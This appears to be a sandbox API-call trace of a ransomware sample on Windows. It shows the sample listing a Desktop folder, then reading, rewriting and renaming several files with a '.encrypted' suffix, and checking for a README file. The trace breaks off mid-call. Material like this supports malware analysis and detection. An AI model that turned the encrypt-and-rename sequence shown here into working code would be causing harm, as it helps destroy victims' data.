[0154.006] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.006] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.006] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu", lpFilePart=0x0) returned 0x38 [0154.006] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\", lpFilePart=0x0) returned 0x39 [0154.006] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1881900, ftCreationTime.dwHighDateTime=0x1d5e0fa, ftLastAccessTime.dwLowDateTime=0xa89c79b0, ftLastAccessTime.dwHighDateTime=0x1d5e43e, ftLastWriteTime.dwLowDateTime=0xa89c79b0, ftLastWriteTime.dwHighDateTime=0x1d5e43e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee630 [0154.007] FindNextFileW (in: hFindFile=0x94ee630, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1881900, ftCreationTime.dwHighDateTime=0x1d5e0fa, ftLastAccessTime.dwLowDateTime=0xa89c79b0, ftLastAccessTime.dwHighDateTime=0x1d5e43e, ftLastWriteTime.dwLowDateTime=0xa89c79b0, ftLastWriteTime.dwHighDateTime=0x1d5e43e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.007] FindNextFileW (in: hFindFile=0x94ee630, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34531e30, ftCreationTime.dwHighDateTime=0x1d5e293, ftLastAccessTime.dwLowDateTime=0x503224a0, ftLastAccessTime.dwHighDateTime=0x1d5e0ba, ftLastWriteTime.dwLowDateTime=0x503224a0, ftLastWriteTime.dwHighDateTime=0x1d5e0ba, nFileSizeHigh=0x0, nFileSizeLow=0x3958, dwReserved0=0x0, dwReserved1=0x0, cFileName="1T7hbySAx_O.flv", cAlternateFileName="1T7HBY~1.FLV")) returned 1 [0154.007] FindNextFileW (in: hFindFile=0x94ee630, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74ba96f0, ftCreationTime.dwHighDateTime=0x1d5e0dc, ftLastAccessTime.dwLowDateTime=0x7f032a90, ftLastAccessTime.dwHighDateTime=0x1d5dd4a, ftLastWriteTime.dwLowDateTime=0x7f032a90, ftLastWriteTime.dwHighDateTime=0x1d5dd4a, nFileSizeHigh=0x0, nFileSizeLow=0x4b26, dwReserved0=0x0, dwReserved1=0x0, cFileName="sVNB4Q6EMhZ-85Nyf.m4a", cAlternateFileName="SVNB4Q~1.M4A")) returned 1 [0154.008] FindNextFileW (in: hFindFile=0x94ee630, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10530440, ftCreationTime.dwHighDateTime=0x1d5dd17, ftLastAccessTime.dwLowDateTime=0x520ea050, ftLastAccessTime.dwHighDateTime=0x1d5dd9a, ftLastWriteTime.dwLowDateTime=0x520ea050, ftLastWriteTime.dwHighDateTime=0x1d5dd9a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UZv83ywZ1", cAlternateFileName="UZV83Y~1")) returned 1 [0154.008] FindNextFileW (in: hFindFile=0x94ee630, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaad53f20, ftCreationTime.dwHighDateTime=0x1d5dd4d, ftLastAccessTime.dwLowDateTime=0xac16dc90, ftLastAccessTime.dwHighDateTime=0x1d5e18f, ftLastWriteTime.dwLowDateTime=0xac16dc90, ftLastWriteTime.dwHighDateTime=0x1d5e18f, nFileSizeHigh=0x0, nFileSizeLow=0x15c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="yfEyi0g4or WM2-.csv", cAlternateFileName="YFEYI0~1.CSV")) returned 1 [0154.008] FindNextFileW (in: hFindFile=0x94ee630, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x334ce130, ftCreationTime.dwHighDateTime=0x1d5e174, ftLastAccessTime.dwLowDateTime=0xb8dc6860, ftLastAccessTime.dwHighDateTime=0x1d5e332, ftLastWriteTime.dwLowDateTime=0xb8dc6860, ftLastWriteTime.dwHighDateTime=0x1d5e332, nFileSizeHigh=0x0, nFileSizeLow=0x2086, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZWOOCJ aKdwB n.png", cAlternateFileName="ZWOOCJ~1.PNG")) returned 1 [0154.008] FindNextFileW (in: hFindFile=0x94ee630, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd56c9450, ftCreationTime.dwHighDateTime=0x1d5d86f, ftLastAccessTime.dwLowDateTime=0x57ce95b0, ftLastAccessTime.dwHighDateTime=0x1d5e2a7, ftLastWriteTime.dwLowDateTime=0x57ce95b0, ftLastWriteTime.dwHighDateTime=0x1d5e2a7, nFileSizeHigh=0x0, nFileSizeLow=0x173ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="zY_e0OtuhW9esck3P.png", cAlternateFileName="ZY_E0O~1.PNG")) returned 1 [0154.008] FindNextFileW (in: hFindFile=0x94ee630, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd56c9450, ftCreationTime.dwHighDateTime=0x1d5d86f, ftLastAccessTime.dwLowDateTime=0x57ce95b0, ftLastAccessTime.dwHighDateTime=0x1d5e2a7, ftLastWriteTime.dwLowDateTime=0x57ce95b0, ftLastWriteTime.dwHighDateTime=0x1d5e2a7, nFileSizeHigh=0x0, nFileSizeLow=0x173ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="zY_e0OtuhW9esck3P.png", cAlternateFileName="ZY_E0O~1.PNG")) returned 0 [0154.008] FindClose (in: hFindFile=0x94ee630 | out: hFindFile=0x94ee630) returned 1 [0154.009] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.009] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.009] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\yfEyi0g4or WM2-.csv", nBufferLength=0x105, lpBuffer=0x2ee26c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\yfEyi0g4or WM2-.csv", lpFilePart=0x0) returned 0x4c [0154.009] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee760) returned 1 [0154.009] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\yfEyi0g4or WM2-.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\_rq9gu\\yfeyi0g4or wm2-.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0154.012] GetFileType (hFile=0x4d0) returned 0x1 [0154.012] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee75c) returned 1 [0154.012] GetFileType (hFile=0x4d0) returned 0x1 [0154.012] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee868 | out: lpFileSizeHigh=0x2ee868*=0x0) returned 0x15c1e [0154.013] ReadFile (in: hFile=0x4d0, lpBuffer=0x530b710, nNumberOfBytesToRead=0x15c1e, lpNumberOfBytesRead=0x2ee814, lpOverlapped=0x0 | out: lpBuffer=0x530b710*, lpNumberOfBytesRead=0x2ee814*=0x15c1e, lpOverlapped=0x0) returned 1 [0154.074] CloseHandle (hObject=0x4d0) returned 1 [0154.092] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0154.092] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7e0) returned 1 [0154.092] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee85c | out: lpFileInformation=0x2ee85c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0154.092] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7dc) returned 1 [0154.092] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\yfEyi0g4or WM2-.csv", nBufferLength=0x105, lpBuffer=0x2ee254, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\yfEyi0g4or WM2-.csv", lpFilePart=0x0) returned 0x4c [0154.092] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee748) returned 1 [0154.092] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\yfEyi0g4or WM2-.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\_rq9gu\\yfeyi0g4or wm2-.csv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0154.094] GetFileType (hFile=0x4d0) returned 0x1 [0154.094] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee744) returned 1 [0154.094] GetFileType (hFile=0x4d0) returned 0x1 [0154.094] WriteFile (in: hFile=0x4d0, lpBuffer=0x53783f0*, nNumberOfBytesToWrite=0x15c20, lpNumberOfBytesWritten=0x2ee804, lpOverlapped=0x0 | out: lpBuffer=0x53783f0*, lpNumberOfBytesWritten=0x2ee804*=0x15c20, lpOverlapped=0x0) returned 1 [0154.096] CloseHandle (hObject=0x4d0) returned 1 [0154.097] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\yfEyi0g4or WM2-.csv", nBufferLength=0x105, lpBuffer=0x2ee38c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\yfEyi0g4or WM2-.csv", lpFilePart=0x0) returned 0x4c [0154.097] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\yfEyi0g4or WM2-.csv.encrypted", nBufferLength=0x105, lpBuffer=0x2ee38c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\yfEyi0g4or WM2-.csv.encrypted", lpFilePart=0x0) returned 0x56 [0154.097] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ec) returned 1 [0154.097] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\yfEyi0g4or WM2-.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\_rq9gu\\yfeyi0g4or wm2-.csv"), fInfoLevelId=0x0, lpFileInformation=0x2ee868 | out: lpFileInformation=0x2ee868*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaad53f20, ftCreationTime.dwHighDateTime=0x1d5dd4d, ftLastAccessTime.dwLowDateTime=0xac16dc90, ftLastAccessTime.dwHighDateTime=0x1d5e18f, ftLastWriteTime.dwLowDateTime=0x42d07180, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x15c20)) returned 1 [0154.098] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7e8) returned 1 [0154.098] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\yfEyi0g4or WM2-.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\_rq9gu\\yfeyi0g4or wm2-.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\yfEyi0g4or WM2-.csv.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\_rq9gu\\yfeyi0g4or wm2-.csv.encrypted")) returned 1 [0154.099] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\ZWOOCJ aKdwB n.png", nBufferLength=0x105, lpBuffer=0x2ee26c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\ZWOOCJ aKdwB n.png", lpFilePart=0x0) returned 0x4b [0154.099] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee760) returned 1 [0154.099] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\ZWOOCJ aKdwB n.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\_rq9gu\\zwoocj akdwb n.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0154.102] GetFileType (hFile=0x4d0) returned 0x1 [0154.102] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee75c) returned 1 [0154.102] GetFileType (hFile=0x4d0) returned 0x1 [0154.102] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee868 | out: lpFileSizeHigh=0x2ee868*=0x0) returned 0x2086 [0154.102] ReadFile (in: hFile=0x4d0, lpBuffer=0x2452630, nNumberOfBytesToRead=0x2086, lpNumberOfBytesRead=0x2ee814, lpOverlapped=0x0 | out: lpBuffer=0x2452630*, lpNumberOfBytesRead=0x2ee814*=0x2086, lpOverlapped=0x0) returned 1 [0154.103] CloseHandle (hObject=0x4d0) returned 1 [0154.145] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0154.145] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7e0) returned 1 [0154.145] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee85c | out: lpFileInformation=0x2ee85c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0154.145] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7dc) returned 1 [0154.145] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\ZWOOCJ aKdwB n.png", nBufferLength=0x105, lpBuffer=0x2ee254, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\ZWOOCJ aKdwB n.png", lpFilePart=0x0) returned 0x4b [0154.145] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee748) returned 1 [0154.145] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\ZWOOCJ aKdwB n.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\_rq9gu\\zwoocj akdwb n.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0154.146] GetFileType (hFile=0x4d0) returned 0x1 [0154.146] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee744) returned 1 [0154.146] GetFileType (hFile=0x4d0) returned 0x1 [0154.146] WriteFile (in: hFile=0x4d0, lpBuffer=0x2297adc*, nNumberOfBytesToWrite=0x2090, lpNumberOfBytesWritten=0x2ee804, lpOverlapped=0x0 | out: lpBuffer=0x2297adc*, lpNumberOfBytesWritten=0x2ee804*=0x2090, lpOverlapped=0x0) returned 1 [0154.147] CloseHandle (hObject=0x4d0) returned 1 [0154.148] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\ZWOOCJ aKdwB n.png", nBufferLength=0x105, lpBuffer=0x2ee38c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\ZWOOCJ aKdwB n.png", lpFilePart=0x0) returned 0x4b [0154.148] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\ZWOOCJ aKdwB n.png.encrypted", nBufferLength=0x105, lpBuffer=0x2ee38c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\ZWOOCJ aKdwB n.png.encrypted", lpFilePart=0x0) returned 0x55 [0154.148] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ec) returned 1 [0154.148] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\ZWOOCJ aKdwB n.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\_rq9gu\\zwoocj akdwb n.png"), fInfoLevelId=0x0, lpFileInformation=0x2ee868 | out: lpFileInformation=0x2ee868*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x334ce130, ftCreationTime.dwHighDateTime=0x1d5e174, ftLastAccessTime.dwLowDateTime=0xb8dc6860, ftLastAccessTime.dwHighDateTime=0x1d5e332, ftLastWriteTime.dwLowDateTime=0x42d795a0, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x2090)) returned 1 [0154.148] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7e8) returned 1 [0154.149] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\ZWOOCJ aKdwB n.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\_rq9gu\\zwoocj akdwb n.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\ZWOOCJ aKdwB n.png.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\_rq9gu\\zwoocj akdwb n.png.encrypted")) returned 1 [0154.150] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\zY_e0OtuhW9esck3P.png", nBufferLength=0x105, lpBuffer=0x2ee26c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\zY_e0OtuhW9esck3P.png", lpFilePart=0x0) returned 0x4e [0154.150] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee760) returned 1 [0154.150] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\zY_e0OtuhW9esck3P.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\_rq9gu\\zy_e0otuhw9esck3p.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0154.151] GetFileType (hFile=0x4d0) returned 0x1 [0154.151] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee75c) returned 1 [0154.151] GetFileType (hFile=0x4d0) returned 0x1 [0154.151] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee868 | out: lpFileSizeHigh=0x2ee868*=0x0) returned 0x173ca [0154.152] ReadFile (in: hFile=0x4d0, lpBuffer=0x538e030, nNumberOfBytesToRead=0x173ca, lpNumberOfBytesRead=0x2ee814, lpOverlapped=0x0 | out: lpBuffer=0x538e030*, lpNumberOfBytesRead=0x2ee814*=0x173ca, lpOverlapped=0x0) returned 1 [0154.154] CloseHandle (hObject=0x4d0) returned 1 [0154.172] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0154.172] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7e0) returned 1 [0154.172] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee85c | out: lpFileInformation=0x2ee85c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0154.172] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7dc) returned 1 [0154.172] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\zY_e0OtuhW9esck3P.png", nBufferLength=0x105, lpBuffer=0x2ee254, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\zY_e0OtuhW9esck3P.png", lpFilePart=0x0) returned 0x4e [0154.172] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee748) returned 1 [0154.172] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\zY_e0OtuhW9esck3P.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\_rq9gu\\zy_e0otuhw9esck3p.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0154.174] GetFileType (hFile=0x4d0) returned 0x1 [0154.174] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee744) returned 1 [0154.174] GetFileType (hFile=0x4d0) returned 0x1 [0154.174] WriteFile (in: hFile=0x4d0, lpBuffer=0x5402378*, nNumberOfBytesToWrite=0x173d0, lpNumberOfBytesWritten=0x2ee804, lpOverlapped=0x0 | out: lpBuffer=0x5402378*, lpNumberOfBytesWritten=0x2ee804*=0x173d0, lpOverlapped=0x0) returned 1 [0154.176] CloseHandle (hObject=0x4d0) returned 1 [0154.177] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\zY_e0OtuhW9esck3P.png", nBufferLength=0x105, lpBuffer=0x2ee38c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\zY_e0OtuhW9esck3P.png", lpFilePart=0x0) returned 0x4e [0154.177] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\zY_e0OtuhW9esck3P.png.encrypted", nBufferLength=0x105, lpBuffer=0x2ee38c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\zY_e0OtuhW9esck3P.png.encrypted", lpFilePart=0x0) returned 0x58 [0154.178] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ec) returned 1 [0154.178] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\zY_e0OtuhW9esck3P.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\_rq9gu\\zy_e0otuhw9esck3p.png"), fInfoLevelId=0x0, lpFileInformation=0x2ee868 | out: lpFileInformation=0x2ee868*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd56c9450, ftCreationTime.dwHighDateTime=0x1d5d86f, ftLastAccessTime.dwLowDateTime=0x57ce95b0, ftLastAccessTime.dwHighDateTime=0x1d5e2a7, ftLastWriteTime.dwLowDateTime=0x42dc5860, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x173d0)) returned 1 [0154.178] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7e8) returned 1 [0154.178] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\zY_e0OtuhW9esck3P.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\_rq9gu\\zy_e0otuhw9esck3p.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\zY_e0OtuhW9esck3P.png.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\_rq9gu\\zy_e0otuhw9esck3p.png.encrypted")) returned 1 [0154.179] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee838) returned 1 [0154.179] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\UZv83ywZ1", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\UZv83ywZ1", lpFilePart=0x0) returned 0x42 [0154.179] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\_RQ9Gu\\UZv83ywZ1\\", nBufferLength=0x105, lpBuffer=0x2ee314, lpFilePart=0x0 | out: 